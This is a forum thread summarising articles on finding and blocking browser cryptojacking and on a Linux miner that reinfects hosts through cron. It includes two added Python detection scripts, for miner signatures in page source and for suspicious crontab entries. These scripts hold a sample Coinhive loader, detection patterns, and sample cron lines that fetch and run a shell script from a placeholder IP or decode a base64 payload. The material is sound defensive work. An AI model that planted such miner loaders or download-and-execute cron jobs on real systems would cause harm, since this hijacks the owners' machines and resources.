
finding cryptojacking malware with PublicWWW

Posted: Sat 14 Apr 2018, 12:12
by labbe5
https://badpackets.net/how-to-find-cryp ... g-malware/

Cryptojacking malware continues to spread across the web, largely due to the popularity of Coinhive. Since Coinhive’s launch in September 2017, numerous cryptojacking clones have come about.

The tool I’ve chosen to locate them with is PublicWWW. This is a search engine that indexes the entire source code of websites.


Further reading:
https://badpackets.net/my-favorite-webs ... -services/
Cryptojacking detection was added to urlscan.io early in January 2018. This enables you to check if a website is engaging in malicious cryptocurrency mining, based on known signatures of cryptojacking malware (JavaScript).
https://urlscan.io/
https://sitecheck.sucuri.net/

How to stop cryptojacking

Posted: Wed 27 Jun 2018, 19:19
by labbe5
https://badpackets.net/how-to-stop-cryptojacking/

Cryptojacking is defined as hijacking your desktop/laptop computer, mobile device, or server to surreptitiously mine cryptocurrency for someone else’s profit. In other words, it’s the theft of computational resources (CPU) and energy (electricity).

Cryptojacking most commonly happens through a web browser. Malicious cryptomining scripts (sometimes referred to as coinminers) are frequently found being injected on compromised websites. Some affected sites have been of well-known organizations and government institutions. Many of the hacked sites found were using vulnerable content management systems or compromised third-party services.

Cryptojacking is typically resource intensive as malicious cryptocurrency mining consumes all CPU resources available. This is because the amount of CPU power used correlates to the speed at which hashes can be generated (mined). The faster hashes are mined, the faster money is made.


Cryptojacking can be stopped by using a browser extension designed to block malicious cryptocurrency mining scripts.

MinerBlock is an addon for Firefox and Chrome.

https://addons.mozilla.org/en-US/firefo ... ock-origin

Further reading:
https://www.guidingtech.com/block-crypt ... ng-firefox
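The first two posts describe the same mechanism from two sides: urlscan.io flags pages by matching known cryptojacking JavaScript signatures, and MinerBlock blocks the script hosts and API calls in the browser. Below is an added example of that signature check, written for this thread; it is not code from badpackets.net, urlscan.io, PublicWWW or MinerBlock. The host list and regex patterns are an assumption modelled on the Coinhive loader (the coinhive.com script host and the CoinHive.Anonymous/CoinHive.User API), and the two sample pages are constructed inputs; a real scanner would load a maintained blocklist.

```python
"""Signature-based check for browser cryptojacking in page source.

Added example, not code from the articles or tools named in this thread.
The indicator lists are an assumption modelled on the Coinhive loader.
"""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import urlparse

# Assumed script hosts associated with in-browser miners (illustrative only).
MINER_HOSTS = ["coinhive.com", "coin-hive.com", "authedmine.com"]

# Assumed inline JavaScript indicators: the miner API constructor, the
# loader file name, and the CryptoNight WebAssembly module such miners fetch.
MINER_JS_PATTERNS = [
    ("coinhive_api", re.compile(r"\bCoinHive\.(Anonymous|User)\s*\(")),
    ("coinhive_loader", re.compile(r"coinhive\.min\.js", re.I)),
    ("cryptonight_wasm", re.compile(r"cryptonight\.wasm", re.I)),
]

SCRIPT_SRC_RE = re.compile(r"""<script[^>]*\ssrc=["']([^"']+)["']""", re.I)


@dataclass
class Finding:
    kind: str        # "script_host" or one of the pattern names above
    indicator: str   # matched host or matched text
    where: str       # script URL, or "line N" of the page source


def script_sources(html: str) -> List[str]:
    """Return the src attribute of every external <script> tag."""
    return [m.group(1) for m in SCRIPT_SRC_RE.finditer(html)]


def _host_matches(host: str) -> bool:
    # Match the listed host and any subdomain of it.
    return any(host == h or host.endswith("." + h) for h in MINER_HOSTS)


def scan_source(html: str) -> List[Finding]:
    """Scan HTML/JS source and return every miner indicator found."""
    findings: List[Finding] = []
    # 1. External scripts loaded from a known miner host (what a blocklist
    #    extension such as MinerBlock would block at the network level).
    for src in script_sources(html):
        host = (urlparse(src).hostname or "").lower()
        if _host_matches(host):
            findings.append(Finding("script_host", host, src))
    # 2. Inline JavaScript that instantiates the miner or pulls its wasm.
    for lineno, line in enumerate(html.splitlines(), start=1):
        for name, pattern in MINER_JS_PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append(Finding(name, m.group(0), f"line {lineno}"))
    return findings


def is_cryptojacking(html: str) -> bool:
    return bool(scan_source(html))


# Constructed sample input: a page carrying a Coinhive-style loader with a
# placeholder site key, and a clean page for comparison.
INFECTED_PAGE = """<html><head><title>shop</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</head><body>...</body></html>"""

CLEAN_PAGE = """<html><head>
<script src="https://cdn.example.org/app.js"></script>
</head><body>...</body></html>"""


if __name__ == "__main__":
    for label, page in (("infected", INFECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(label, "->", is_cryptojacking(page))
        for f in scan_source(page):
            print("  ", f.kind, f.indicator, f.where)
```

A host-only check misses miners served from a compromised site's own domain or from a freshly registered clone, which is why the inline API and wasm patterns are kept alongside it; conversely, the signature list only ever catches what is already known, so the CPU-usage symptom the second post describes remains the more general tell.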

Cryptominer Uses Cron To Reinfect Linux Host After Removal

Posted: Thu 20 Jun 2019, 21:19
by labbe5
https://www.bleepingcomputer.com/news/s ... r-removal/

A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed.

The malware was initially discovered on a web server with its CPU maxed out by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources.

As Sucuri's security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method — most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials.


Linux targeted with coin miners

The Linux platform is getting more and more attention from cybercriminals as Check Point proved with the discovery of a Backdoor Trojan they dubbed SpeakUp that targets servers running six different Linux distributions to drop XMRig miners.

Another campaign detected by Trend Micro during February deployed the XMR-Stak Cryptonight cryptocurrency miner on Linux machines, at the same time hunting down and killing other Linux malware and coin miners present on computers it compromised.

Also, the Xbash botnet spotted by Palo Alto Networks' Unit 42 in September 2018 comes with self-spreading capabilities and it targets both Linux and Windows servers, combining cryptomining and ransomware capabilities.
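The persistence trick in the third post, a cron job that re-downloads and re-executes the dropper after the miner is cleaned up, is easy to check for on a Linux host. The script below is an added example for this thread, not code from BleepingComputer, Sucuri or any of the vendors named above; it audits crontab text for the patterns such reinfection jobs typically rely on (download piped into a shell, base64-decoded payloads, binaries run from world-writable temp directories, very frequent schedules). The sample crontab is constructed, the indicator regexes are an assumption, and the 198.51.100.7 address is a documentation-range placeholder.

```python
"""Audit crontab entries for cryptominer reinfection patterns.

Added example, not code from the articles in this thread. Run it against
the output of `crontab -l`, /etc/crontab, /etc/cron.d/* and /var/spool/cron/*.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Assumed indicators of a "re-download and re-run" cron job (illustrative).
INDICATORS = [
    ("download_exec", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|da)?sh\b")),
    ("base64_decode", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(ba|da)?sh\b")),
    ("temp_exec", re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/")),
]
HIGH_FREQUENCY_MINUTES = 5   # assumed threshold: runs at least every 5 minutes


@dataclass
class CronFinding:
    schedule: str
    command: str
    reasons: List[str] = field(default_factory=list)


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (schedule, command) pairs; skips comments and VAR=value lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):               # @reboot, @hourly, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)        # m h dom mon dow command
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        entries.append((sched, cmd.strip()))
    return entries


def schedule_interval_minutes(schedule: str) -> Optional[int]:
    """Interval in minutes for '*' or '*/N' minute fields, else None."""
    if schedule.startswith("@"):
        return None
    minute = schedule.split()[0]
    if minute == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute)
    return int(m.group(1)) if m else None


def audit_crontab(text: str) -> List[CronFinding]:
    """Return only the entries that trip at least one indicator."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = [name for name, pat in INDICATORS if pat.search(cmd)]
        interval = schedule_interval_minutes(sched)
        if interval is not None and interval <= HIGH_FREQUENCY_MINUTES:
            reasons.append("high_frequency")
        if reasons:
            findings.append(CronFinding(sched, cmd, reasons))
    return findings


# Constructed sample crontab: one legitimate backup job and three entries
# shaped like the reinfection jobs described in the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh > /dev/null 2>&1
@reboot /tmp/.X11-unix/.kthreadd
30 6 * * 1 echo d2dldCAtTyAvdG1wL3guc2gg | base64 -d | bash
"""


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(f.reasons)}] {f.schedule} {f.command}")
```

The point of the schedule check is the cleanup failure the post describes: killing the miner process and deleting its binary does nothing if a job fires again within minutes, so the cron entries (and any systemd timers or rc scripts) have to go first. Only crontabs readable by the user running the script are covered, so run it as root to see every user's spool.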